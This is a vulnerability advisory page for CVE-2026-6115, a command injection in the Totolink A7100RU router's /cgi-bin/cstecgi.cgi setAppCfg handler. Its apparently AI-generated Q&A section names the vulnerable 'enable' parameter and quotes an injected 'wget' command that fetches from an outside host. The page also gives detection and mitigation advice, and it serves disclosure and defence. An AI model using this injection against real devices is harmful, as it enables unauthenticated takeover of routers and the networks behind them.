CVE-2026-6115
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-12
Last updated on: 2026-04-12
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-6115 is a command injection vulnerability found in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI Handler component, specifically in the function setAppCfg of the file /cgi-bin/cstecgi.cgi. The vulnerability arises from improper handling of the "enable" parameter, which is passed to a system command execution function without proper sanitization.
An attacker can send a specially crafted HTTP POST request containing a malicious "enable" parameter value that gets executed on the router's operating system. This allows remote attackers to execute arbitrary OS commands on the affected device.
For example, an attacker can inject commands like `wget 192.168.6.1:7777/testpoc` which the router will execute, demonstrating the ability to run arbitrary commands remotely.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router without any authentication.
- Attackers can take full control of the router, potentially altering its configuration or behavior.
- It can be used to install malware, create backdoors, or pivot to other devices on the network.
- The router could be used as part of a botnet or to intercept and manipulate network traffic.
- Overall, it poses a significant security risk to the network and connected devices.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious HTTP POST requests sent to the endpoint /cgi-bin/cstecgi.cgi on the Totolink A7100RU router. Specifically, look for POST requests containing a JSON payload with the parameter "enable" set to unusual or command-like values.
A practical detection method is to capture network traffic and search for POST requests to /cgi-bin/cstecgi.cgi with payloads that include the "enable" parameter. For example, using tools like tcpdump or Wireshark to filter HTTP POST requests to this URI.
Example commands to detect such activity include:
- Using tcpdump to capture HTTP POST requests to the vulnerable endpoint: tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i 'POST /cgi-bin/cstecgi.cgi'
- Using curl or similar tools to test if the device is vulnerable by sending a crafted POST request with a malicious "enable" parameter.
Detection can also involve checking device logs for unexpected execution of commands or network connections initiated by the router, such as wget commands to unknown IP addresses.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks only, such as by implementing firewall rules that block external access to the router's management interface.
Disabling remote management features on the Totolink A7100RU router can reduce the attack surface and prevent remote exploitation.
Monitoring and blocking suspicious HTTP POST requests targeting the "enable" parameter can help prevent exploitation attempts.
If available, applying firmware updates or patches from the vendor that address this vulnerability is the most effective long-term mitigation.
As a temporary workaround, consider isolating the device from untrusted networks until a patch is applied.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router. This can lead to unauthorized access, data breaches, and potential compromise of sensitive information.
Such security risks can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.
However, the provided information does not explicitly detail the direct effects on compliance with these standards.